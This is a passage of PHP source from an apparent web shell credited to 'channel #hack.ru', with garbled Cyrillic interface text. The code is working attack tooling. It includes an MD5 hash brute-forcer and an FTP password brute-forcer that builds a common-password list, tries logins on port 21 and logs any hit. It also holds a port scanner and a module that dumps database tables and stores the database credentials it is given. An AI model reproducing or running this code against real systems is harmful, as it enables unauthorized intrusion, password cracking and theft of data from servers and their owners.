|
|
result(implode($word));
|
|
}else {
|
|
for ($i7 = 0; $i7 <= $c; $i7++) {
|
|
$word[7] = $chars_de{$i7};
|
|
if ($next <= 7) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i8 = 0; $i8 <= $c; $i8++) {
|
|
$word[8] = $chars_de{$i8};
|
|
if ($next <= 8) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i9 = 0; $i9 <= $c; $i9++) {
|
|
$word[9] = $chars_de{$i9};
|
|
if ($next <= 9) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i10 = 0; $i10 <= $c; $i10++) {
|
|
$word[10] = $chars_de{$i10};
|
|
if ($next <= 10) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i11 = 0; $i11 <= $c; $i11++) {
|
|
$word[11] = $chars_de{$i11};
|
|
if ($next <= 11) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i12 = 0; $i12 <= $c; $i12++) {
|
|
$word[12] = $chars_de{$i12};
|
|
if ($next <= 12) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i13 = 0; $i13 <= $c; $i13++) {
|
|
$word[13] = $chars_de{$i13};
|
|
if ($next <= 13) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i14 = 0; $i14 <= $c; $i14++) {
|
|
$word[14] = $chars_de{$i14};
|
|
if ($next <= 14) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i15 = 0; $i15 <= $c; $i15++) {
|
|
$word[15] = $chars_de{$i15};
|
|
if ($next <= 15) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i16 = 0; $i16 <= $c; $i16++) {
|
|
$word[16] = $chars_de{$i16};
|
|
if ($next <= 16) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i17 = 0; $i17 <= $c; $i17++) {
|
|
$word[17] = $chars_de{$i17};
|
|
if ($next <= 17) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i18 = 0; $i18 <= $c; $i18++) {
|
|
$word[18] = $chars_de{$i18};
|
|
if ($next <= 18) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i19 = 0; $i19 <= $c; $i19++) {
|
|
$word[19] = $chars_de{$i19};
|
|
if ($next <= 19) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i20 = 0; $i20 <= $c; $i20++) {
|
|
$word[20] = $chars_de{$i20};
|
|
if ($next <= 20) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i21 = 0; $i21 <= $c; $i21++) {
|
|
$word[21] = $chars_de{$i21};
|
|
if ($next <= 21) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i22 = 0; $i22 <= $c; $i22++) {
|
|
$word[22] = $chars_de{$i22};
|
|
if ($next <= 22) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i23 = 0; $i23 <= $c; $i23++) {
|
|
$word[23] = $chars_de{$i23};
|
|
if ($next <= 23) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i24 = 0; $i24 <= $c; $i24++) {
|
|
$word[24] = $chars_de{$i24};
|
|
if ($next <= 24) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i25 = 0; $i25 <= $c; $i25++) {
|
|
$word[25] = $chars_de{$i25};
|
|
if ($next <= 25) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i26 = 0; $i26 <= $c; $i26++) {
|
|
$word[26] = $chars_de{$i26};
|
|
if ($next <= 26) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i27 = 0; $i27 <= $c; $i27++) {
|
|
$word[27] = $chars_de{$i27};
|
|
if ($next <= 27) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i28 = 0; $i28 <= $c; $i28++) {
|
|
$word[28] = $chars_de{$i28};
|
|
if ($next <= 28) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i29 = 0; $i29 <= $c; $i29++) {
|
|
$word[29] = $chars_de{$i29};
|
|
if ($next <= 29) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i30 = 0; $i30 <= $c; $i30++) {
|
|
$word[30] = $chars_de{$i30};
|
|
if ($next <= 30) {
|
|
result(implode($word));
|
|
}else {
|
|
for ($i31 = 0; $i31 <= $c; $i31++) {
|
|
$word[31] = $chars_de{$i31};
|
|
if ($next <= 31) {
|
|
result(implode($word));
|
|
|
|
}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
|
|
|
|
function result($word) {
|
|
global $dat,$date;
|
|
$pass_de=$_POST[pass_de];
|
|
$dat2=date("H:i:s");
|
|
$date2=date("d:m:Y");
|
|
|
|
if(md5($word)==$pass_de){
|
|
print "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC> Ðåçóëüòàò âûïîëíåíèÿ ïåðåáîðà ïàðîëåé:</td></tr>
|
|
<tr><td class=pagetitle width=400> <b>Çàõåøèðîâàííûé ïàðîëü:</b></td><td class=pagetitle width=100><font color=red> <b>$word</b></font></td></tr>
|
|
<tr><td class=pagetitle width=200> <b>Íà÷àëî ïåðåáîðà:</b></td><td class=pagetitle width=200><font color=#ffffcc> <b>$dat - $date</b></font></td></tr>
|
|
<tr><td class=pagetitle width=200> <b>Îêîí÷àíèå ïåðåáîðà:</b></td><td class=pagetitle width=200><font color=#ffffcc> <b>$dat2 - $date2</b></font></td></tr>
|
|
<tr><td align=left valign=top colspan=2 bgcolor=#FFFFCC> Âûïîëíåíèå ïåðåáîðà õåøåé çàïèñàí â ôàéë: <b>".$word."_md5</b></td></tr>
|
|
</table>
|
|
";
|
|
$f=@fopen($word._md5,"a+");
|
|
fputs($f,"Õýø èç MD5 [$pass_de] = $word\nÍà÷àëî ïåðåáîðà:\t$dat - $date\nÎêîí÷àíèå ïåðåáîðà:\t$dat2 - $date2\n ");
|
|
exit;}
|
|
|
|
|
|
|
|
}
|
|
|
|
function brut_ftp() {
|
|
global $action,$private_site, $title_exp,$login, $host, $file, $chislo, $proverka;
|
|
set_time_limit(0);
|
|
ignore_user_abort(1);
|
|
echo "<br>
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b>Áðóòôîðñåð ÔÒÏ</b></font></b></td></tr>
|
|
<tr><td bgcolor=#FFFFCC><br><blockquote>Ñ ïîìîùüþ äàííîãî áðóòôîðñåðà âû ñìîæåòå ïîäîáðàòü ïàðîëü ê ëþáîìó õîñòèíãó áåç ïðîáëåì, ÷òîáû áûëî ÷òî ïåðåáèðàòü ÿ äîáàâèë áàçó
|
|
ïàðîëåé, êîòîðàÿ ãåíåðèðóåòñÿ íà ëåòó ( íå ïèøèòå áîëüøèå öèôðû â <b>êîëëè÷åñòâå ïàðîëåé</b> òàê êàê ýòî ñåðüåçíàÿ íàãðóçêà íà ñåðâåð 10000 âïîëíå õâàòèò) . </blockquote></td></tr>
|
|
</table>";
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<form action='$PHP_SELF?action=brut_ftp' method=post><tr><td align=left valign=top colspan=3 class=pagetitle>
|
|
<b>Brut FTP:</b></td></tr>
|
|
<tr> <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC width=500>
|
|
<b>Brutforcer Ftp</b>(ïîëíîöåííûé áðóòôîðñåð, êîòîðûé ðàáîòàåò ïî ìåòîäó ïîäñòàíîâêè ïàðîëåé, êîòîðûå áåðåò èç ôàéëà, ôàéë ãåíåðèðóåòñÿ ñàì, âû òîëüêî óêàçûâàåòå ÷èñëî ïàðîëåé è âñå ïåðåáîð íà÷èíàåòñÿ!!!)</td></tr>
|
|
<tr><td align=center class=pagetitle width=150> FTPHost:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='host' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Login:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='login' size=50></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Êîëëè÷åñòâî ïàðîëåé:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='chislo' size=10></td></tr>
|
|
<tr><td align=center class=pagetitle width=150> Ïàðîëü äëÿ ïðîâåðêè:</td>
|
|
<td align=left width=350>
|
|
<input class='inputbox' type='text' name='proverka' size=50></td></tr>
|
|
<tr><td width=500 align=center colspan=2><input type='submit' value='Brut FTP' class=button1 $style_button>
|
|
</td></tr>
|
|
|
|
</form></table>";
|
|
|
|
|
|
function s() {
|
|
$word="qwrtypsdfghjklzxcvbnm";
|
|
return $word[mt_rand(0,strlen($word)-1)];
|
|
}
|
|
|
|
function g() {
|
|
$word="euioam";
|
|
return $word[mt_rand(0,strlen($word)-2)];
|
|
}
|
|
|
|
function name0() { return s().g().s(); }
|
|
function name1() { return s().g().s().g(); }
|
|
function name2() { return s().g().g().s(); }
|
|
function name3() { return s().s().g().s().g(); }
|
|
function name4() { return g().s().g().s().g(); }
|
|
function name5() { return g().g().s().g().s(); }
|
|
function name6() { return g().s().s().g().s(); }
|
|
function name7() { return s().g().g().s().g(); }
|
|
function name8() { return s().g().s().g().g(); }
|
|
function name9() { return s().g().s().g().s().g(); }
|
|
function name10() { return s().g().s().s().g().s().s(); }
|
|
function name11() { return s().g().s().s().g().s().s().g(); }
|
|
|
|
$cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005);
|
|
$cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker');
|
|
|
|
function randword() {
|
|
global $cool;
|
|
$func="name".mt_rand(0,11);
|
|
$func2="name".mt_rand(0,11);
|
|
switch (mt_rand(0,11)) {
|
|
case 0: return $func().mt_rand(5,99);
|
|
case 1: return $func()."-".$func2();
|
|
case 2: return $func().$cool[mt_rand(0,count($cool)-1)];
|
|
case 3: return $func()."!".$func();
|
|
case 4: return randpass(mt_rand(5,12));
|
|
default: return $func();
|
|
}
|
|
|
|
|
|
}
|
|
|
|
function randpass($len) {
|
|
$word="qwertyuiopasdfghjklzxcvbnm1234567890";
|
|
$s="";
|
|
for ($i=0; $i<$len; $i++) {
|
|
$s.=$word[mt_rand(0,strlen($word)-1)];
|
|
}
|
|
return $s;
|
|
}
|
|
if (@unlink("pass.txt") < 0){
|
|
echo "íåòó íè÷åãî";
|
|
exit;
|
|
}
|
|
$file="pass.txt";
|
|
if($file && $host && $login){
|
|
$cn=mt_rand(30,30);
|
|
for ($i=0; $i<$cn; $i++) {
|
|
$s=$cool2[$i];
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$s\n");
|
|
}
|
|
|
|
$cnt2=mt_rand(43,43);
|
|
for ($i=0; $i<$cnt2; $i++) {
|
|
$r=$cool[$i];
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$login$r\n");
|
|
}
|
|
$p="$proverka";
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$p\n");
|
|
|
|
$cnt3=mt_rand($chislo,$chislo);
|
|
for ($i=0; $i<$cnt3; $i++) {
|
|
$u=randword();
|
|
$f=@fopen(pass.".txt","a+");
|
|
fputs($f,"$u\n");
|
|
}
|
|
|
|
if(is_file($file)){
|
|
$passwd=file($file,1000);
|
|
for($i=0; $i<count($passwd); $i++){
|
|
$stop=false;
|
|
$password=trim($passwd[$i]);
|
|
$open_ftp=@fsockopen($host,21);
|
|
if($open_ftp!=false){
|
|
fputs($open_ftp,"user $login\n");
|
|
fputs($open_ftp,"pass $password\n");
|
|
while(!feof($open_ftp) && $stop!=true){
|
|
$text=fgets($open_ftp,4096);
|
|
if(preg_match("/230/",$text)){
|
|
$stop=true;
|
|
$f=@fopen($host._ftp,"a+");
|
|
fputs($f,"Enter on ftp:\nFTPhosting:\t$host\nLogin:\t$login\nPassword:\t$password\n ");
|
|
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle><b><font color=\"blue\">Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.</font></b><br>
|
|
Êîíåêò: <b>$host</b><br> Ëîãèí: <b>$login</b><br> Ïàðîëü: <b>$password</b></td></tr></table>
|
|
";exit;
|
|
}
|
|
elseif(preg_match("/530/",$text)){
|
|
$stop=true;
|
|
|
|
}
|
|
}
|
|
fclose($open_ftp);
|
|
}else{
|
|
echo "
|
|
<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
|
|
<tr><td align=center class=pagetitle bgcolor=#FF0000><b>Íå âåðíî óêàçàíî ôòï õîñòèíãà!!! Íà <b><u>$host</u></b> çàêðûò 21 ïîðò</b></b></td></tr>
|
|
</table>
|
|
";exit;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
}
|
|
|
|
# Ïîðòñêàí
|
|
function portscan() {
|
|
global $action,$portscan,$port,$HTTP_HOST,$min,$max;
|
|
|
|
$mtime = explode(" ",microtime());
|
|
$mtime = $mtime[1] + $mtime[0];
|
|
$time1 = $mtime;
|
|
|
|
$id = $HTTP_HOST;
|
|
echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Ðåçóëüòàòû ñêàíèðîâàíèÿ:</b> $id</td></tr><tr><td valign=top class=pagetitle >Ñêàíèðóåì õîñòèíã íà íàëè÷èå îòêðûòûõ ïîðòîâ" . "...<br></td></tr></table>";
|
|
|
|
$lport = $min;
|
|
$hport = $max;
|
|
$op = 0;
|
|
$gp = 0;
|
|
|
|
for ($porta=$lport; $porta<=$hport; $porta++) {
|
|
$fp = @fsockopen("$id", $porta, &$errno, &$errstr, 4);
|
|
if ( !$fp ) { $gp++; }
|
|
else {
|
|
$port_addres = $port[$porta];
|
|
if($port_addres == "") $port_addres = "unknown";
|
|
$serv = getservbyport($porta, TCP);
|
|
echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#FFFFCC BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center width=10%>Port:<b>$porta / $serv</b></td><td align=center width=80%>$port_addres</td><td align=center width=10%>(<a href=\"http://www.google.de/search?q=%22$port_addres2%22&ie=ISO-8859-1&hl=de&btnG=Google+Suche&meta=\" target=_blank>×òî ýòî?</a>)</td></tr>";
|
|
$op++;
|
|
}
|
|
}
|
|
|
|
if($op == 0) echo "<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=pagetitle><b>Íà äàííîì õîñòèíãå íåò îòêðûòûõ ïîðòîâ</b></td></tr></table>";
|
|
|
|
$unsi = ($op/$porta)*100;
|
|
$unsi = round($unsi);
|
|
|
|
echo "<tr><td align=center width=100% bgcolor=#184984 class=pagetitle colspan=3><b>Ñòàòèñòèêà ñêàíèðîâàíèÿ:</b></b></td></tr>";
|
|
echo "<tr><td align=center width=100% colspan=3><b>Ïðîñêàíèðîâàííûõ ïîðòîâ:</b> $porta</td></tr>";
|
|
echo "<tr><td align=center width=100% colspan=3><b>Îòêðûòûõ ïîðòîâ:</b> $op</td></tr>";
|
|
echo "<tr><td align=center width=100% colspan=3><b>Çàêðûòûõ ïîðòîâ:</b> $gp</td></tr>";
|
|
|
|
$mtime = explode(" ",microtime());
|
|
$mtime = $mtime[1] + $mtime[0];
|
|
$time2 = $mtime;
|
|
$loadtime = ($time2 - $time1);
|
|
$loadtime = round($loadtime, 2);
|
|
|
|
echo "<tr colspan=2><td align=center width=100% colspan=3><b>Âðåìÿ ñêàíèðîâàíèÿ:</b> $loadtime ñåêóíä</tr></table>";
|
|
}
|
|
|
|
function nfm_copyright() {
|
|
global $action;
|
|
return "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#000000' face='Tahoma' size = 2><b>Powered by channel #hack.ru (author xoce). Made In Russia </b></font></center></td></tr></table></body></html>";
|
|
|
|
}
|
|
|
|
// =-=-=-=-= SQL MODULE =-=-=-=-=
|
|
// SQL functions start
|
|
function aff_date() {
|
|
$date_now=date("F j,Y,g:i a");
|
|
return $date_now;
|
|
}
|
|
|
|
function sqldumptable($table) {
|
|
global $sv_s,$sv_d,$drp_tbl;
|
|
$tabledump = "";
|
|
if ($sv_s) {
|
|
if ($drp_tbl) { $tabledump.="DROP TABLE IF EXISTS $table;\n"; }
|
|
$tabledump.="CREATE TABLE $table (\n";
|
|
$firstfield=1;
|
|
$champs=mysql_query("SHOW FIELDS FROM $table");
|
|
while ($champ=mysql_fetch_array($champs)) {
|
|
if (!$firstfield) { $tabledump.=",\n"; }
|
|
else { $firstfield=0;}
|
|
$tabledump.=" $champ[Field] $champ[Type]";
|
|
if ($champ['Null'] !="YES") { $tabledump.=" NOT NULL";}
|
|
if (!empty($champ['Default'])) { $tabledump.=" default '$champ[Default]'";}
|
|
if ($champ['Extra'] !="") { $tabledump.=" $champ[Extra]";}
|
|
}
|
|
|
|
@mysql_free_result($champs);
|
|
$keys=mysql_query("SHOW KEYS FROM $table");
|
|
while ($key=mysql_fetch_array($keys)) {
|
|
$kname=$key['Key_name'];
|
|
if ($kname !="PRIMARY" and $key['Non_unique']==0) { $kname="UNIQUE|$kname";}
|
|
if(!is_array($index[$kname])) { $index[$kname]=array();}
|
|
$index[$kname][]=$key['Column_name'];
|
|
}
|
|
|
|
@mysql_free_result($keys);
|
|
while(list($kname,$columns)=@each($index)) {
|
|
$tabledump.=",\n";
|
|
$colnames=implode($columns,",");
|
|
if($kname=="PRIMARY") { $tabledump.=" PRIMARY KEY ($colnames)";}
|
|
else {
|
|
if (substr($kname,0,6)=="UNIQUE") { $kname=substr($kname,7);}
|
|
$tabledump.=" KEY $kname ($colnames)";
|
|
}
|
|
}
|
|
$tabledump.="\n);\n\n";
|
|
}
|
|
|
|
if ($sv_d) {
|
|
$rows=mysql_query("SELECT * FROM $table");
|
|
$numfields=mysql_num_fields($rows);
|
|
while ($row=mysql_fetch_array($rows)) {
|
|
$tabledump.="INSERT INTO $table VALUES(";
|
|
$cptchamp=-1;
|
|
$firstfield=1;
|
|
while (++$cptchamp<$numfields) {
|
|
if (!$firstfield) { $tabledump.=",";}
|
|
else { $firstfield=0;}
|
|
if (!isset($row[$cptchamp])) {$tabledump.="NULL";}
|
|
else { $tabledump.="'".mysql_escape_string($row[$cptchamp])."'";}
|
|
}
|
|
$tabledump.=");\n";
|
|
}
|
|
@mysql_free_result($rows);
|
|
}
|
|
|
|
return $tabledump;
|
|
}
|
|
|
|
function csvdumptable($table) {
|
|
global $sv_s,$sv_d;
|
|
$csvdump="## Table:$table \n\n";
|
|
if ($sv_s) {
|
|
$firstfield=1;
|
|
$champs=mysql_query("SHOW FIELDS FROM $table");
|
|
while ($champ=mysql_fetch_array($champs)) {
|
|
if (!$firstfield) { $csvdump.=",";}
|
|
else { $firstfield=0;}
|
|
$csvdump.="'".$champ['Field']."'";
|
|
}
|
|
|
|
@mysql_free_result($champs);
|
|
$csvdump.="\n";
|
|
}
|
|
|
|
if ($sv_d) {
|
|
$rows=mysql_query("SELECT * FROM $table");
|
|
$numfields=mysql_num_fields($rows);
|
|
while ($row=mysql_fetch_array($rows)) {
|
|
$cptchamp=-1;
|
|
$firstfield=1;
|
|
while (++$cptchamp<$numfields) {
|
|
if (!$firstfield) { $csvdump.=",";}
|
|
else { $firstfield=0;}
|
|
if (!isset($row[$cptchamp])) { $csvdump.="NULL";}
|
|
else { $csvdump.="'".addslashes($row[$cptchamp])."'";}
|
|
}
|
|
$csvdump.="\n";
|
|
}
|
|
}
|
|
|
|
@mysql_free_result($rows);
|
|
return $csvdump;
|
|
}
|
|
|
|
function write_file($data) {
|
|
global $g_fp,$file_type;
|
|
if ($file_type==1) { gzwrite($g_fp,$data); }
|
|
else { fwrite ($g_fp,$data); }
|
|
}
|
|
|
|
function open_file($file_name) {
|
|
global $g_fp,$file_type,$dbbase,$f_nm;
|
|
if ($file_type==1) { $g_fp=gzopen($file_name,"wb9"); }
|
|
else { $g_fp=fopen ($file_name,"w"); }
|
|
|
|
$f_nm[]=$file_name;
|
|
$data="";
|
|
$data.="##\n";
|
|
$data.="## NFM hack.ru creator \n";
|
|
$data.="##-------------------------\n";
|
|
$data.="## Date:".aff_date()."\n";
|
|
$data.="## Base:$dbbase \n";
|
|
$data.="##-------------------------\n\n";
|
|
write_file($data);
|
|
unset($data);
|
|
}
|
|
|
|
function file_pos() {
|
|
global $g_fp,$file_type;
|
|
if ($file_type=="1") { return gztell ($g_fp); }
|
|
else { return ftell ($g_fp); }
|
|
}
|
|
|
|
function close_file() {
|
|
global $g_fp,$file_type;
|
|
if ($file_type=="1") { gzclose ($g_fp); }
|
|
else { fclose ($g_fp); }
|
|
}
|
|
|
|
function split_sql_file($sql) {
|
|
$morc=explode(";",$sql);
|
|
$sql="";
|
|
$output=array();
|
|
$matches=array();
|
|
$morc_cpt=count($morc);
|
|
for ($i=0;$i < $morc_cpt;$i++) {
|
|
if (($i !=($morc_cpt-1)) || (strlen($morc[$i] > 0))) {
|
|
$total_quotes=preg_match_all("/'/",$morc[$i],$matches);
|
|
$escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$i],$matches);
|
|
$unescaped_quotes=$total_quotes-$escaped_quotes;
|
|
if (($unescaped_quotes % 2)==0) { $output[]=$morc[$i]; $morc[$i]=""; }
|
|
else {
|
|
$temp=$morc[$i].";";
|
|
$morc[$i]="";
|
|
$complete_stmt=false;
|
|
for ($j=$i+1;(!$complete_stmt && ($j < $morc_cpt));$j++) {
|
|
$total_quotes = preg_match_all("/'/",$morc[$j],$matches);
|
|
$escaped_quotes=preg_match_all("/(?<!\\\\)(\\\\\\\\)*\\\\'/",$morc[$j],$matches);
|
|
$unescaped_quotes=$total_quotes-$escaped_quotes;
|
|
if (($unescaped_quotes % 2)==1) {
|
|
$output[]=$temp.$morc[$j];
|
|
$morc[$j]="";
|
|
$temp="";
|
|
$complete_stmt=true;
|
|
$i=$j;
|
|
} else {
|
|
$temp.=$morc[$j].";";
|
|
$morc[$j]="";
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
return $output;
|
|
}
|
|
|
|
function split_csv_file($csv) { return explode("\n",$csv); }
|
|
// SQL functions END
|
|
|
|
// main SQL()
|
|
function sql() {
|
|
global $sqlaction,$sv_s,$sv_d,$drp_tbl,$g_fp,$file_type,$dbbase,$f_nm;
|
|
$secu_config="xtdump_conf.inc.php";
|
|
$dbhost=$_POST['dbhost'];
|
|
$dbuser=$_POST['dbuser'];
|
|
$dbpass=$_POST['dbpass'];
|
|
$dbbase=$_POST['dbbase'];
|
|
$tbls =$_POST['tbls'];
|
|
$sqlaction =$_POST['sqlaction'];
|
|
$secu =$_POST['secu'];
|
|
$f_cut =$_POST['f_cut'];
|
|
$max_sql =$_POST['max_sql'];
|
|
$opt =$_POST['opt'];
|
|
$savmode =$_POST['savmode'];
|
|
$file_type =$_POST['file_type'];
|
|
$ecraz =$_POST['ecraz'];
|
|
$f_tbl =$_POST['f_tbl'];
|
|
$drp_tbl=$_POST['drp_tbl'];
|
|
|
|
$header="<center><table width=620 cellpadding=0 cellspacing=0 align=center><col width=1><col width=600><col width=1><tr><td></td><td align=left class=texte><br>";
|
|
$footer="<center><a href='javascript:history.go(-1)' target='_self' class=link>-íàçàä-</a><br></center><br></td><td></td></tr><tr><td height=1 colspan=3></td></tr></table></center>".nfm_copyright();
|
|
|
|
// SQL actions STARTS
|
|
|
|
if ($sqlaction=='save') {
|
|
if ($secu==1) {
|
|
$fp=fopen($secu_config,"w");
|
|
fputs($fp,"<?php\n");
|
|
fputs($fp,"\$dbhost='$dbhost';\n");
|
|
fputs($fp,"\$dbbase='$dbbase';\n");
|
|
fputs($fp,"\$dbuser='$dbuser';\n");
|
|
fputs($fp,"\$dbpass='$dbpass';\n");
|
|
fputs($fp,"?>");
|
|
fclose($fp);
|
|
}
|
|
if (!is_array($tbls)) {
|
|
echo $header."
|
|
<br><center><font color=red>ÒÛ ÇÀÁÛË âûäåëèòü íóæíûå òåáå òàáëèöû äëÿ äàìïèíãà =)</b></font></center>\n$footer";
|
|
exit;
|
|
}
|
|
if($f_cut==1) {
|
|
if (!is_numeric($max_sql)) {
|
|
echo $header."<br><center><font color=red><b>Îøèáêà.</b></font></center>\n$footer";
|
|
exit;
|
|
}
|
|
if ($max_sql < 200000) {
|
|
echo $header."<br><center><font color=red><b>áàçà sql áîëüøå 200 000 ìá</b></font></center>\n$footer";
|
|
exit;
|
|
}
|
|
}
|
|
|
|
$tbl=array();
|
|
$tbl[]=reset($tbls);
|
|
if (count($tbls) > 1) {
|
|
$a=true;
|
|
while ($a !=false) {
|
|
$a=next($tbls);
|
|
if ($a !=false) { $tbl[]=$a; }
|
|
}
|
|
}
|
|
|
|
if ($opt==1) { $sv_s=true; $sv_d=true; }
|
|
else if ($opt==2) { $sv_s=true;$sv_d=false;$fc ="_struct"; }
|
|
else if ($opt==3) { $sv_s=false;$sv_d=true;$fc ="_data"; }
|
|
else { exit; }
|
|
|
|
$fext=".".$savmode;
|
|
$fich=$dbbase.$fc.$fext;
|
|
$dte="";
|
|
if ($ecraz !=1) { $dte=date("dMy_Hi")."_"; } $gz="";
|
|
if ($file_type=='1') { $gz.=".gz"; }
|
|
$fcut=false;
|
|
$ftbl=false;
|
|
$f_nm=array();
|
|
if($f_cut==1) { $fcut=true;$max_sql=$max_sql;$nbf=1;$f_size=170;}
|
|
if($f_tbl==1) { $ftbl=true; }
|
|
else {
|
|
if(!$fcut) { open_file("dump_".$dte.$dbbase.$fc.$fext.$gz); }
|
|
else { open_file("dump_".$dte.$dbbase.$fc."_1".$fext.$gz); }
|
|
}
|
|
|
|
$nbf=1;
|
|
mysql_connect($dbhost,$dbuser,$dbpass);
|
|
mysql_select_db($dbbase);
|
|
if ($fext==".sql") {
|
|
if ($ftbl) {
|
|
while (list($i)=each($tbl)) {
|
|
$temp=sqldumptable($tbl[$i]);
|
|
$sz_t=strlen($temp);
|
|
if ($fcut) {
|
|
open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);
|
|
$nbf=0;
|
|
$p_sql=split_sql_file($temp);
|
|
while(list($j,$val)=each($p_sql)) {
|
|
if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
|
|
else { close_file(); $nbf++; open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".sql".$gz); write_file($val.";"); }
|
|
}
|
|
close_file();
|
|
}
|
|
else { open_file("dump_".$dte.$tbl[$i].$fc.".sql".$gz);write_file($temp."\n\n");close_file();$nbf=1; }
|
|
$tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
|
|
}
|
|
} else {
|
|
$tblsv="";
|
|
while (list($i)=each($tbl)) {
|
|
$temp=sqldumptable($tbl[$i]);
|
|
$sz_t=strlen($temp);
|
|
if ($fcut && ((file_pos()+$sz_t) > $max_sql)) {
|
|
$p_sql=split_sql_file($temp);
|
|
while(list($j,$val)=each($p_sql)) {
|
|
if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val.";"); }
|
|
else {
|
|
close_file();
|
|
$nbf++;
|
|
open_file("dump_".$dte.$dbbase.$fc."_".$nbf.".sql".$gz);
|
|
write_file($val.";");
|
|
}
|
|
}
|
|
} else { write_file($temp); }
|
|
$tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
|
|
}
|
|
}
|
|
}
|
|
else if ($fext==".csv") {
|
|
if ($ftbl) {
|
|
while (list($i)=each($tbl)) {
|
|
$temp=csvdumptable($tbl[$i]);
|
|
$sz_t=strlen($temp);
|
|
if ($fcut) {
|
|
open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
|
|
$nbf=0;
|
|
$p_csv=split_csv_file($temp);
|
|
while(list($j,$val)=each($p_csv)) {
|
|
if ((file_pos()+6+strlen($val)) < $max_sql) { write_file($val."\n"); }
|
|
else {
|
|
close_file();
|
|
$nbf++;
|
|
open_file("dump_".$dte.$tbl[$i].$fc."_".$nbf.".csv".$gz);
|
|
write_file($val."\n");
|
|
}
|
|
}
|
|
close_file();
|
|
} else {
|
|
open_file("dump_".$dte.$tbl[$i].$fc.".csv".$gz);
|
|
write_file($temp."\n\n");
|
|
close_file();
|
|
$nbf=1;
|
|
}
|
|
$tblsv=$tblsv."<b>".$tbl[$i]."</b>,<br>";
|
|
}
|
|
} else {
|
|
while (list($i)=each($tbl)) {
|
|
$temp=csvdumptable($tbl[$i]);
|
|
$sz_t=strlen($temp);
|
|
